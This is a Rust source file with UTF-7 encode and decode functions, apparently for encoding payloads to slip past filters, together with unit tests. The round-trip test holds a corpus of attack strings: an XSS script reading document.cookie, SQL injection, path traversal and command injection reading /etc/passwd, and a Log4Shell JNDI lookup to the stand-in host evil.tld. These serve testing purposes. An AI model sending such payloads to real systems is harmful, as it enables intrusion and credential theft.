1use base64::{Engine as _, engine::general_purpose};
15
16fn char_to_utf16be(c: char) -> Vec<u8> {
18 let mut buf = [0u16; 2];
19 let enc = c.encode_utf16(&mut buf);
20 let mut out = Vec::with_capacity(enc.len() * 2);
21 for u in enc {
22 out.push((*u >> 8) as u8);
23 out.push((*u & 0xFF) as u8);
24 }
25 out
26}
27
28fn modified_base64(bytes: &[u8]) -> String {
30 let mut b64 = general_purpose::STANDARD.encode(bytes);
31 b64.retain(|c| c != '=');
32 b64
33}
34
35fn is_utf7_direct(ch: char) -> bool {
37 matches!(
38 ch,
39 'A'..='Z'
40 | 'a'..='z'
41 | '0'..='9'
42 | '\''
43 | '('
44 | ')'
45 | ','
46 | '-'
47 | '.'
48 | '/'
49 | ':'
50 | '?'
51 )
52}
53
54#[must_use]
59pub fn utf7_encode(payload: &str) -> String {
60 let mut out = String::new();
61 let mut shift_buf: Vec<u8> = Vec::new();
62
63 fn flush_shift(out: &mut String, buf: &mut Vec<u8>) {
64 if !buf.is_empty() {
65 out.push('+');
66 out.push_str(&modified_base64(buf));
67 out.push('-');
68 buf.clear();
69 }
70 }
71
72 for ch in payload.chars() {
73 if ch == '+' {
74 flush_shift(&mut out, &mut shift_buf);
75 out.push_str("+-");
76 } else if is_utf7_direct(ch) {
77 flush_shift(&mut out, &mut shift_buf);
78 out.push(ch);
79 } else {
80 shift_buf.extend_from_slice(&char_to_utf16be(ch));
81 }
82 }
83 flush_shift(&mut out, &mut shift_buf);
84 out
85}
86
87fn is_modified_base64_byte(b: u8) -> bool {
91 b.is_ascii_alphanumeric() || b == b'+' || b == b'/'
92}
93
94fn utf8_lead_len(first: u8) -> usize {
97 match first {
98 0x00..=0x7F => 1,
99 0xC0..=0xDF => 2,
100 0xE0..=0xEF => 3,
101 _ => 4,
102 }
103}
104
105#[must_use]
113pub fn utf7_decode(s: &str) -> Option<String> {
114 let b = s.as_bytes();
115 let mut out = String::new();
116 let mut i = 0;
117 while i < b.len() {
118 if b[i] == b'+' {
119 if i + 1 < b.len() && b[i + 1] == b'-' {
121 out.push('+');
122 i += 2;
123 continue;
124 }
125 let start = i + 1;
127 let mut j = start;
128 while j < b.len() && is_modified_base64_byte(b[j]) {
129 j += 1;
130 }
131 let mut chunk = s[start..j].to_string();
132 while !chunk.len().is_multiple_of(4) {
133 chunk.push('='); }
135 let raw = general_purpose::STANDARD.decode(chunk.as_bytes()).ok()?;
136 if raw.len() % 2 != 0 {
137 return None; }
139 let units: Vec<u16> = raw
140 .chunks_exact(2)
141 .map(|c| (u16::from(c[0]) << 8) | u16::from(c[1]))
142 .collect();
143 out.push_str(&String::from_utf16(&units).ok()?);
144 i = j;
145 if i < b.len() && b[i] == b'-' {
146 i += 1; }
148 } else {
149 let len = utf8_lead_len(b[i]);
150 if i + len > b.len() {
151 return None;
152 }
153 out.push_str(s.get(i..i + len)?);
154 i += len;
155 }
156 }
157 Some(out)
158}
159
160#[cfg(test)]
161mod tests {
162 use super::{utf7_decode, utf7_encode};
163
164 #[test]
165 fn utf7_basic_encode() {
166 assert_eq!(utf7_encode("Hello"), "Hello"); assert_eq!(utf7_encode("A+B"), "A+-B"); assert!(utf7_encode("日本語").starts_with('+')); }
170
171 #[test]
172 fn utf7_decode_matches_canonical_vectors() {
173 assert_eq!(utf7_decode("+ADw-script+AD4-").as_deref(), Some("<script>"));
175 assert_eq!(utf7_decode("+-").as_deref(), Some("+"));
176 assert_eq!(utf7_decode("hello").as_deref(), Some("hello"));
177 assert_eq!(utf7_encode("<script>"), "+ADw-script+AD4-");
179 }
180
181 #[test]
182 fn utf7_round_trips_attack_corpus_and_unicode() {
183 let corpus = [
186 "<script>alert(document.cookie)</script>",
187 "' OR '1'='1' -- ",
188 "1 UNION SELECT password FROM users",
189 "../../../../etc/passwd",
190 "${jndi:ldap://evil.tld/a}",
191 "; cat /etc/passwd",
192 "plain ascii",
193 "+already+plus+",
194 "café ☕ 日本語 😀 surrogate-pair",
195 "",
196 "=",
197 "<>\"'&;|()[]{}",
198 ];
199 for p in corpus {
200 let enc = utf7_encode(p);
201 assert_eq!(
202 utf7_decode(&enc).as_deref(),
203 Some(p),
204 "UTF-7 round-trip lost bytes for {p:?} via {enc}"
205 );
206 }
207 }
208}